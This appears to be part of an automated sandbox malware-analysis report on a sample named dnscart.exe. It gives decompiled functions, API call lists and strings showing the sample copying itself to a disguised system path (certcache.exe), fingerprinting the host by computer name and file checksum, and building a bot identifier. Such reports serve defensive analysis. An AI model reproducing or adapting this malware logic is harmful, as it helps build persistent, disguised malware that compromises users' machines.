						_t30 = MapViewOfFile(); // executed
						_t36 = _t30;
						if(_t36 != 0) {
							 *0x22cbd0 = RtlComputeCrc32(0, _t36, GetFileSize(_t43, 0));
							UnmapViewOfFile(_t36);
						}
						CloseHandle(_t40);
					}
					CloseHandle(_t43);
				}
				 *(_t45 - 8) = 0x10;
				_t20 = GetComputerNameW(_t45 - 0x28, _t45 - 8); // executed
				if(_t20 != 0) {
					_t38 = _t45 - 0x28;
					if( *(_t45 - 0x28) != 0) {
						goto 0x2319f0;
						asm("int3");
						do {
							_t27 =  *_t38 & 0x0000ffff;
							if(_t27 < 0x30 || _t27 > 0x39) {
								if(_t27 < 0x61 || _t27 > 0x7a) {
									if(_t27 < 0x41 || _t27 > 0x5a) {
										 *_t38 = _t39;
									}
								}
							}
							_t38 =  &(_t38[1]);
						} while ( *_t38 != 0);
					}
					_t44 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t44 == 0) {
						_t44 =  *(_t45 - 8);
					} else {
						goto 0x231a04;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("scasb");
						asm("int3");
						E00221790(_t38, _t39);
						_t48 = _t48 + 8;
					}
					 *0x22c1f8("216554_6C0D37D2", 0x104, _t44, _t45 - 0x28,  *0x22c3ac);
					_t20 = HeapFree(GetProcessHeap(), 0, _t44);
				}
				goto 0x231a1e;
				return _t20;
			}

0x002294c1
0x002294c1
0x002294c6
0x002294de
0x002294f1
0x002294f7
0x0022950f
0x00229515
0x00229522
0x0022953c
0x00229542
0x00229547
0x00229549
0x0022954e
0x0022954f
0x00229550
0x00229551
0x00229552
0x00229553
0x00229554
0x0022955a
0x0022955e
0x00229560
0x00229565
0x00229566
0x00229567
0x00229568
0x00229569
0x0022956f
0x00229573
0x00229589
0x0022958e
0x0022958e
0x00229595
0x00229595
0x0022959c
0x0022959c
0x002295a5
0x002295b1
0x002295ba
0x002295c5
0x002295c8
0x002295ca
0x002295cf
0x002295d0
0x002295d0
0x002295d6
0x002295e0
0x002295ea
0x002295f1
0x002295f1
0x002295ea
0x002295e0
0x002295f4
0x002295f7
0x002295d0
0x0022960e
0x00229612
0x0022962a
0x00229614
0x00229614
0x00229619
0x0022961a
0x0022961b
0x0022961c
0x0022961d
0x0022961e
0x0022961f
0x00229620
0x00229625
0x00229625
0x00229642
0x00229655
0x00229655
0x0022965b
0x00229660

APIs

_snwprintf.NTDLL ref: 002294DE
GetProcessHeap.KERNEL32(00000000,?), ref: 002294EA
HeapFree.KERNEL32(00000000), ref: 002294F1
_snwprintf.NTDLL ref: 0022950F
GetProcessHeap.KERNEL32(00000000,?), ref: 0022951B
HeapFree.KERNEL32(00000000), ref: 00229522
CreateFileW.KERNEL32(C:\Users\user\Desktop\dnscart.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0022953C
GetComputerNameW.KERNEL32(?,?), ref: 002295B1
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00229601
RtlAllocateHeap.NTDLL(00000000), ref: 00229608
_snprintf.NTDLL ref: 00229642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 0022964E
HeapFree.KERNEL32(00000000), ref: 00229655

Strings

216554_6C0D37D2, xrefs: 0022963D
C:\Windows\SysWOW64\certcache.exe, xrefs: 0022950A
C:\Users\user\Desktop\dnscart.exe, xrefs: 00229537
certcache, xrefs: 002294C9, 002294FA
C:\Windows\SysWOW64, xrefs: 002294CE, 002294D9, 002294FF

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00228E20, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 155
string

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00228E20(void* __ebx, void* __edx, void* __edi) {
				void* _v16;
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _v44;
				void* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				void* _v84;
				void* _v92;
				signed int _t28;
				long _t29;

				_t28 = GetTickCount(); // executed
				if(_t28 <  *0x22c278) {
					L24:
					return _t28;
				} else {
					_t29 =  *0x22c280; // 0x0
					_t28 = _t29 - 1;
					if(_t28 > 3) {
						goto L24;
					} else {
						switch( *((intOrPtr*)(_t28 * 4 +  &M00229094))) {
							case 0:
								 *0x22c280 = 2;
								return _t28;
								goto L25;
							case 1:
								 *0x22c280 = 0; // executed
								__eax = L00229670(); // executed
								__eax = __eax;
								if(__eax == 0) {
									 *0x22c280 = 3;
									_pop(__esi);
									return __eax;
								} else {
									if(__eax != 0) {
										goto L24;
									} else {
										__eax = SetEvent( *0x22c29c);
										_pop(__esi);
										return __eax;
									}
								}
								goto L25;
							case 2:
								 *0x22c280 = 0;
								 *0x22c294 = 0x221270;
								 *0x22c298 = 0x221270;
								__eax = L00222310();
								__eax =  *0x22c02c; // 0x2212f8
								 *0x22c26c = __eax;
								__eax =  *0x22c030; // 0x6a
								 *0x22c268 = 0x22c2a8;
								 *0x22c270 = __eax;
								 *0x22c280 = 4;
								_pop(__esi);
								return __eax;
								goto L25;
							case 3:
								__ecx =  &_v28;
								 *0x22c280 = 0;
								__eax = L00228BF0( &_v28);
								__ecx =  &_v36;
								__eax = L00228D90(__eax,  &_v36);
								__eax =  *0x22cbd0; // 0xf71b1512
								_push("216554_6C0D37D2");
								_v32 = __eax;
								_v44 = 0x22c2a8;
								_v44 =  *0x22c130();
								__eax =  *0x22c2a4; // 0x1
								_v52 = __eax;
								do {
									__ecx =  &_v24;
									__esi = 0xdbba0;
									__eax = L00228960(__edx, 0xdbba0);
									__ecx =  &_v16;
									__eax = L0022A7F0(__edx, 0xdbba0);
									__edx =  &_v52;
									__ecx =  &_v84;
									if(L00229FD0(__ebx, __ecx, __edx) != 0) {
										__eax =  &_v92;
										_push( &_v92);
										__eax =  &_v84;
										_push(__eax);
										__eax = L00228560(__eax, __ecx);
										__esp = __esp + 8;
										if(__eax == 0) {
											__eax =  *0x22c298; // 0x0
											__esi = 0x7530;
											__eax = __eax + 8;
											 *0x22c298 = __eax;
											 *0x22c298 = __eax;
										} else {
											__eax = L002299F0(__eax, __ecx, __edi);
											__ecx = 0;
											__eax = E002288F0(0);
											__ecx = 0;
											__eax = E0022A7A0(0);
											__edx =  &_v76;
											__ecx =  &_v92;
											if(L0022A1D0( &_v92, __edx) != 0) {
												__eax = L00221750(__edi);
												__edx = _v72;
												if(__edx != 0) {
													__ecx = _v76;
													__eax = L00229AE0(__eax, _v76, __edx);
												}
												__eax = L00221750(__edi);
												__edx = _v64;
												if(__edx != 0) {
													__ecx = _v68;
													__eax = L002289D0(__edx, __esi);
													__esi = 0;
												}
												__eax = L00221750(__edi);
												__edx = _v56;
												if(__edx != 0) {
													__ecx = _v60;
													__eax = L0022A860(__edx, __esi);
													__esi = 0;
												}
											}
											GetProcessHeap() = HeapFree(__eax, 0, _v92);
										}
										GetProcessHeap() = HeapFree(__eax, 0, _v84);
									}
									GetProcessHeap() = HeapFree(__eax, 0, _v24);
									GetProcessHeap() = HeapFree(__eax, 0, _v16);
								} while (__esi == 0);
								__eax = GetTickCount();
								__eax = __eax + __esi;
								 *0x22c280 = 4;
								 *0x22c278 = __eax;
								GetProcessHeap() = HeapFree(__eax, 0, _v32);
								goto L24;
						}
					}
				}
				L25:
			}

0x00228e2a
0x00228e36
0x0022908d
0x00229091
0x00228e3c
0x00228e3c
0x00228e41
0x00228e45
0x00000000
0x00228e4b
0x00228e4b
0x00000000
0x00228e52
0x00228e60
0x00000000
0x00000000
0x00228e63
0x00228e6d
0x00228e72
0x00228e75
0x00228e91
0x00228e9b
0x00228e9f
0x00228e77
0x00228e78
0x00000000
0x00228e7e
0x00228e84
0x00228e8a
0x00228e8e
0x00228e8e
0x00228e78
0x00000000
0x00000000
0x00228ea2
0x00228eac
0x00228eb6
0x00228ec0
0x00228ec5
0x00228eca
0x00228ecf
0x00228ed4
0x00228ede
0x00228ee3
0x00228eed
0x00228ef1
0x00000000
0x00000000
0x00228ef4
0x00228ef8
0x00228f02
0x00228f07
0x00228f0b
0x00228f10
0x00228f15
0x00228f1a
0x00228f1e
0x00228f2c
0x00228f30
0x00228f38
0x00228f40
0x00228f40
0x00228f44
0x00228f49
0x00228f4e
0x00228f52
0x00228f57
0x00228f5b
0x00228f66
0x00228f6c
0x00228f70
0x00228f71
0x00228f75
0x00228f76
0x00228f7b
0x00228f80
0x00229001
0x00229006
0x0022900b
0x0022900e
0x0022901d
0x00228f82
0x00228f82
0x00228f87
0x00228f89
0x00228f8e
0x00228f90
0x00228f95
0x00228f99
0x00228fa4
0x00228fa6
0x00228fab
0x00228fb1
0x00228fb3
0x00228fb7
0x00228fb7
0x00228fbc
0x00228fc1
0x00228fc7
0x00228fc9
0x00228fcd
0x00228fd2
0x00228fd2
0x00228fd4
0x00228fd9
0x00228fdf
0x00228fe1
0x00228fe5
0x00228fea
0x00228fea
0x00228fdf
0x00228ff9
0x00228ff9
0x0022902f
0x0022902f
0x00229042
0x00229055
0x0022905b
0x00229063
0x0022906d
0x0022906f
0x0022907b
0x00229087
0x00000000
0x00000000
0x00228e4b
0x00228e45
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00228E2A
SetEvent.KERNEL32 ref: 00228E84
lstrlen.KERNEL32 ref: 00228F26
HeapFree.KERNEL32(00000000), ref: 00229087

Part of subcall function 002288F0: WaitForSingleObject.KERNEL32(?,00000000), ref: 00228908

Part of subcall function 0022A7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0022A7B8
Part of subcall function 0022A7A0: CloseHandle.KERNEL32(?), ref: 0022A7CC
Part of subcall function 0022A7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00228F95), ref: 0022A7D5
Part of subcall function 0022A7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 0022A7DC

GetProcessHeap.KERNEL32(00000000,?), ref: 00228FF2
HeapFree.KERNEL32(00000000), ref: 00228FF9
GetProcessHeap.KERNEL32(00000000,?), ref: 00229028
HeapFree.KERNEL32(00000000), ref: 0022902F
GetProcessHeap.KERNEL32(00000000,?), ref: 0022903B
HeapFree.KERNEL32(00000000), ref: 00229042
GetProcessHeap.KERNEL32(00000000,?), ref: 0022904E
HeapFree.KERNEL32(00000000), ref: 00229055
GetTickCount.KERNEL32 ref: 00229063
GetProcessHeap.KERNEL32(00000000,?), ref: 00229080

Strings

216554_6C0D37D2, xrefs: 00228ED4, 00228F15, 00228F1E

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229370, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
string

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E00229370(void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				long _v12;
				short _v44;
				intOrPtr _t23;
				void* _t25;
				void* _t26;
				signed int _t29;
				void* _t45;
				int _t48;
				signed int _t55;
				void* _t56;
				void* _t58;
				void* _t66;
				void* _t67;
				void* _t69;
				void* _t70;
				signed int _t71;
				short _t72;
				void* _t74;
				signed short* _t75;
				void* _t77;
				signed short _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;
				short* _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t96;

				_t84 = __esi;
				_t81 = __edi;
				_t77 = __edx;
				_t70 = __ecx;
				_t23 =  *0x22c27c; // 0x6c0d37d2
				_t93 = _t92 - 0x28;
				 *0x22c3ac = _t23;
				GetModuleFileNameW(0, "C:\Users\joeykelly\Desktop\dnscart.exe", 0x104);
				_t25 = OpenSCManagerW(0, 0, 6); // executed
				if(_t25 != 0) {
					 *0x22c2a4 =  *0x22c2a4 | 0x00000001;
					CloseServiceHandle(_t25);
				}
				_t26 =  *0x22c3ac; // 0x6c0d37d2
				_push(_t84);
				_push(_t81);
				_t85 = 0x22c3b0;
				_v8 = _t26;
				_t82 = RtlAllocateHeap(GetProcessHeap(), 8, 0x15c);
				if(_t82 == 0) {
					_t82 = _v12;
				} else {
					goto 0x23197c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("scasb");
					asm("int3");
					E00221790(_t70, _t77);
					_t93 = _t93 + 8;
				}
				_t29 =  *0x22c130(_t82, _t66);
				_t71 = _t29;
				_t67 = 2;
				_v12 = _t71;
				do {
					_v8 =  !(_t29 / _t71);
					_t29 = _t82 + _t29 % _t71;
					if(_t29 <= _t82) {
						L11:
						if( *_t29 == 0x2c) {
							goto L12;
						}
					} else {
						while( *_t29 != 0x2c) {
							_t29 = _t29 - 1;
							if(_t29 > _t82) {
								continue;
							} else {
								goto L11;
							}
							goto L13;
						}
						L12:
						_t29 = _t29 + 1;
					}
					L13:
					_t72 =  *_t29;
					if(_t72 != 0) {
						while(_t72 != 0x2c) {
							_t29 = _t29 + 1;
							 *_t85 = _t72;
							_t85 = _t85 + 2;
							_t72 =  *_t29;
							if(_t72 != 0) {
								continue;
							}
							goto L17;
						}
					}
					L17:
					_t71 = _v12;
					_t67 = _t67 - 1;
				} while (_t67 != 0);
				HeapFree(GetProcessHeap(), 0, _t82);
				 *_t85 = 0;
				_push( &_v12);
				_push(0x5f395cc9);
				L00221830(0x221384, 0xc);
				_t94 = _t93 + 8;
				_push("C:\Windows\SysWOW64");
				_push(0);
				_push(0);
				if(( *0x22c2a4 & 0x00000001) == 0) {
					 *0x22c214(0, 0x1c);
					_t80 = 0x14;
					_t74 = 0x221530;
				} else {
					 *0x22c214(0, 0x29); // executed
					_t80 = 4;
					_t74 = 0x221380;
				}
				goto 0x2319a9;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				L00221830(_t74, _t80);
				_t86 = _v8;
				 *0x22c20c("C:\Windows\SysWOW64", 0x104, _t86, "C:\Windows\SysWOW64", "certcache");
				HeapFree(GetProcessHeap(), 0, _t86);
				_t87 = _v12;
				 *0x22c20c("C:\Windows\SysWOW64\certcache.exe", 0x104, _t87, "C:\Windows\SysWOW64", "certcache");
				_t96 = _t94 + 0x30;
				HeapFree(GetProcessHeap(), 0, _t87);
				_t45 = CreateFileW("C:\Users\joeykelly\Desktop\dnscart.exe", 0x80000000, 1, 0, 3, 0, 0); // executed
				_t88 = _t45;
				if(_t88 != 0xffffffff) {
					goto 0x2319c0;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3"); // executed
					_t56 = CreateFileMappingW(); // executed
					_t83 = _t56;
					if(_t83 != 0) {
						goto 0x2319d9;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3"); // executed
						_t58 = MapViewOfFile(); // executed
						_t69 = _t58;
						if(_t69 != 0) {
							 *0x22cbd0 = RtlComputeCrc32(0, _t69, GetFileSize(_t88, 0));
							UnmapViewOfFile(_t69);
						}
						CloseHandle(_t83);
					}
					CloseHandle(_t88);
				}
				_v12 = 0x10;
				_t48 = GetComputerNameW( &_v44,  &_v12); // executed
				if(_t48 != 0) {
					_t75 =  &_v44;
					if(_v44 != 0) {
						goto 0x2319f0;
						asm("int3");
						do {
							_t55 =  *_t75 & 0x0000ffff;
							if(_t55 < 0x30 || _t55 > 0x39) {
								if(_t55 < 0x61 || _t55 > 0x7a) {
									if(_t55 < 0x41 || _t55 > 0x5a) {
										 *_t75 = _t80;
									}
								}
							}
							_t75 =  &(_t75[1]);
						} while ( *_t75 != 0);
					}
					_t89 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t89 == 0) {
						_t89 = _v12;
					} else {
						goto 0x231a04;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("scasb");
						asm("int3");
						E00221790(_t75, _t80);
						_t96 = _t96 + 8;
					}
					 *0x22c1f8("216554_6C0D37D2", 0x104, _t89,  &_v44,  *0x22c3ac);
					_t48 = HeapFree(GetProcessHeap(), 0, _t89);
				}
				goto 0x231a1e;
				return _t48;
			}

0x00229370
0x00229370
0x00229370
0x00229370
0x00229373
0x00229378
0x0022937b
0x0022938c
0x00229398
0x002293a0
0x002293a2
0x002293aa
0x002293aa
0x002293b0
0x002293b5
0x002293b6
0x002293be
0x002293c3
0x002293d3
0x002293d7
0x002293ef
0x002293d9
0x002293d9
0x002293de
0x002293df
0x002293e0
0x002293e1
0x002293e2
0x002293e3
0x002293e4
0x002293e5
0x002293ea
0x002293ea
0x002293f4
0x002293fa
0x002293fc
0x00229401
0x00229404
0x0022940d
0x00229410
0x00229415
0x00229421
0x00229424
0x00000000
0x00000000
0x00229417
0x00229417
0x0022941c
0x0022941f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0022941f
0x00229426
0x00229426
0x00229426
0x00229427
0x00229427
0x0022942b
0x00229430
0x00229439
0x0022943a
0x0022943d
0x00229440
0x00229444
0x00000000
0x00000000
0x00000000
0x00229444
0x00229430
0x00229446
0x00229446
0x00229449
0x00229449
0x00229456
0x00229463
0x0022946e
0x0022946f
0x00229474
0x00229479
0x00229483
0x00229488
0x0022948a
0x0022948c
0x002294a8
0x002294ae
0x002294b3
0x0022948e
0x00229492
0x00229498
0x0022949d
0x0022949d
0x002294b8
0x002294bd
0x002294be
0x002294bf
0x002294c0
0x002294c1
0x002294c6
0x002294de
0x002294f1
0x002294f7
0x0022950f
0x00229515
0x00229522
0x0022953c
0x00229542
0x00229547
0x00229549
0x0022954e
0x0022954f
0x00229550
0x00229551
0x00229552
0x00229553
0x00229554
0x0022955a
0x0022955e
0x00229560
0x00229565
0x00229566
0x00229567
0x00229568
0x00229569
0x0022956f
0x00229573
0x00229589
0x0022958e
0x0022958e
0x00229595
0x00229595
0x0022959c
0x0022959c
0x002295a5
0x002295b1
0x002295ba
0x002295c5
0x002295c8
0x002295ca
0x002295cf
0x002295d0
0x002295d0
0x002295d6
0x002295e0
0x002295ea
0x002295f1
0x002295f1
0x002295ea
0x002295e0
0x002295f4
0x002295f7
0x002295d0
0x0022960e
0x00229612
0x0022962a
0x00229614
0x00229614
0x00229619
0x0022961a
0x0022961b
0x0022961c
0x0022961d
0x0022961e
0x0022961f
0x00229620
0x00229625
0x00229625
0x00229642
0x00229655
0x00229655
0x0022965b
0x00229660

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\dnscart.exe,00000104), ref: 0022938C
OpenSCManagerW.SECHOST(00000000,00000000,00000006), ref: 00229398
CloseServiceHandle.SECHOST(00000000), ref: 002293AA
GetProcessHeap.KERNEL32(00000008,0000015C), ref: 002293C6
RtlAllocateHeap.NTDLL(00000000), ref: 002293CD
lstrlen.KERNEL32(?), ref: 002293F4

Strings

C:\Users\user\Desktop\dnscart.exe, xrefs: 00229385
certcache, xrefs: 002293BE

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022967F, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42
string

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpiW.KERNEL32 ref: 00229686
memset.NTDLL ref: 002296AA
memset.NTDLL ref: 002296BB
SHFileOperationW.SHELL32(?), ref: 002296E6

Strings

C:\Windows\SysWOW64\certcache.exe, xrefs: 002296DE
C:\Users\user\Desktop\dnscart.exe, xrefs: 002296D0

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229705, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32 ref: 00229705
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00229717
SHFileOperationW.SHELL32(?), ref: 00229738
SHFileOperationW.SHELL32(?), ref: 00229764

Strings

C:\Windows\SysWOW64\certcache.exe, xrefs: 00229723, 0022975D
C:\Users\user\Desktop\dnscart.exe, xrefs: 00229756

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229569, Relevance: 10.5, APIs: 7, Instructions: 31
file

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 34%

			E00229569(signed short __edx, void* __edi, void* __esi) {
				void* _t8;
				int _t13;
				signed int _t20;
				void* _t24;
				signed short* _t26;
				signed short _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;

				_t29 = __esi;
				_t28 = __edi;
				_t27 = __edx;
				_t8 = MapViewOfFile(??, ??, ??, ??, ??); // executed
				_t24 = _t8;
				if(_t24 != 0) {
					 *0x22cbd0 = RtlComputeCrc32(0, _t24, GetFileSize(__esi, 0));
					UnmapViewOfFile(_t24);
				}
				CloseHandle(_t28);
				CloseHandle(_t29);
				 *(_t31 - 8) = 0x10;
				_t13 = GetComputerNameW(_t31 - 0x28, _t31 - 8); // executed
				if(_t13 != 0) {
					_t26 = _t31 - 0x28;
					if( *(_t31 - 0x28) != 0) {
						goto 0x2319f0;
						asm("int3");
						do {
							_t20 =  *_t26 & 0x0000ffff;
							if(_t20 < 0x30 || _t20 > 0x39) {
								if(_t20 < 0x61 || _t20 > 0x7a) {
									if(_t20 < 0x41 || _t20 > 0x5a) {
										 *_t26 = _t27;
									}
								}
							}
							_t26 =  &(_t26[1]);
						} while ( *_t26 != 0);
					}
					_t30 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t30 == 0) {
						_t30 =  *(_t31 - 8);
					} else {
						goto 0x231a04;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("scasb");
						asm("int3");
						E00221790(_t26, _t27);
						_t32 = _t32 + 8;
					}
					 *0x22c1f8("216554_6C0D37D2", 0x104, _t30, _t31 - 0x28,  *0x22c3ac);
					_t13 = HeapFree(GetProcessHeap(), 0, _t30);
				}
				goto 0x231a1e;
				return _t13;
			}

0x00229569
0x00229569
0x00229569
0x00229569
0x0022956f
0x00229573
0x00229589
0x0022958e
0x0022958e
0x00229595
0x0022959c
0x002295a5
0x002295b1
0x002295ba
0x002295c5
0x002295c8
0x002295ca
0x002295cf
0x002295d0
0x002295d0
0x002295d6
0x002295e0
0x002295ea
0x002295f1
0x002295f1
0x002295ea
0x002295e0
0x002295f4
0x002295f7
0x002295d0
0x0022960e
0x00229612
0x0022962a
0x00229614
0x00229614
0x00229619
0x0022961a
0x0022961b
0x0022961c
0x0022961d
0x0022961e
0x0022961f
0x00229620
0x00229625
0x00229625
0x00229642
0x00229655
0x00229655
0x0022965b
0x00229660

APIs

MapViewOfFile.KERNELBASE ref: 00229569
GetFileSize.KERNEL32(?,00000000), ref: 00229578
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 00229582
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0022958E
CloseHandle.KERNEL32 ref: 00229595
CloseHandle.KERNEL32 ref: 0022959C
GetComputerNameW.KERNEL32(?,?), ref: 002295B1
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00229601
RtlAllocateHeap.NTDLL(00000000), ref: 00229608
_snprintf.NTDLL ref: 00229642
GetProcessHeap.KERNEL32(00000000,00000010), ref: 0022964E
HeapFree.KERNEL32(00000000), ref: 00229655

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00221670, Relevance: 9.0, APIs: 6, Instructions: 33

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00221670(signed int __eax, void* __ebx, void* __esi) {
				signed int _t38;

				_t38 = __eax %  *(__esi + __ebx - 0x17);
			}

0x00221670

APIs

CreateMutexW.KERNELBASE(?), ref: 0022167E
CloseHandle.KERNEL32 ref: 0022168B
GetLastError.KERNEL32 ref: 00221699
SetEvent.KERNEL32 ref: 002216A7
CloseHandle.KERNEL32 ref: 002216AE
CloseHandle.KERNEL32(00000000), ref: 002216B5

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 00229409, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000), ref: 0022944F
HeapFree.KERNEL32(00000000), ref: 00229456
SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\SysWOW64), ref: 00229492
SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,C:\Windows\SysWOW64), ref: 002294A8

Strings

C:\Windows\SysWOW64, xrefs: 00229483

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0022198B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 43%

			E0022198B() {
				int _t10;
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t15;

				asm("scasb");
				asm("int3");
				L00221830(_t11, _t12);
				_t13 =  *(_t15 - 4);
				 *0x22c20c(_t15 - 0x20c, 0x104, _t13, "C:\Windows\SysWOW64\certcache.exe", _t13);
				HeapFree(GetProcessHeap(), 0, _t13);
				_t10 = DeleteFileW(_t15 - 0x20c); // executed
				return _t10;
			}

0x0022198b
0x0022198c
0x0022198d
0x00221992
0x002219a8
0x002219bb
0x002219c8
0x002219d2

APIs

_snwprintf.NTDLL ref: 002219A8
GetProcessHeap.KERNEL32(00000000,?), ref: 002219B4
HeapFree.KERNEL32(00000000), ref: 002219BB
DeleteFileW.KERNELBASE(?), ref: 002219C8

Strings

C:\Windows\SysWOW64\certcache.exe, xrefs: 0022199C

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
Associated: 00000002.00000002.240744384.000000000022C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_220000_dnscart.jbxd

Function 0021201B, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 18
string

Control-flow Graph

Executed
Not Executed

APIs

lstrcmp.KERNEL32(face,book), ref: 0021203A

Strings

just string, xrefs: 00212020
face, xrefs: 00212032
book, xrefs: 0021202D

Memory Dump Source

Source File: 00000002.00000002.240626114.0000000000210000.00000040.sdmp, Offset: 00210000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_210000_dnscart.jbxd

Function 00229F9D, Relevance: 6.0, APIs: 4, Instructions: 10

C-Code - Quality: 58%

			E00229F9D() {
				void* _t5;
				void* _t6;
				void* _t7;

				memset();
				HeapFree(GetProcessHeap(), 0, _t7); // executed
				L002215B0(_t5, _t6); // executed
				ExitProcess(0);
			}

0x00229f9d
0x00229fb0
0x00229fb6
0x00229fbd

APIs

memset.NTDLL ref: 00229F9D
GetProcessHeap.KERNEL32(00000000), ref: 00229FA9
HeapFree.KERNEL32(00000000), ref: 00229FB0
ExitProcess.KERNEL32 ref: 00229FBD

Memory Dump Source

Source File: 00000002.00000002.240677943.0000000000221000.00000020.sdmp, Offset: 00220000, based on PE: true

Associated: 00000002.00000002.240659867.0000000000220000.00000002.sdmp
Associated: 00000002.00000002.240709385.000000000022B000.00000002.sdmp
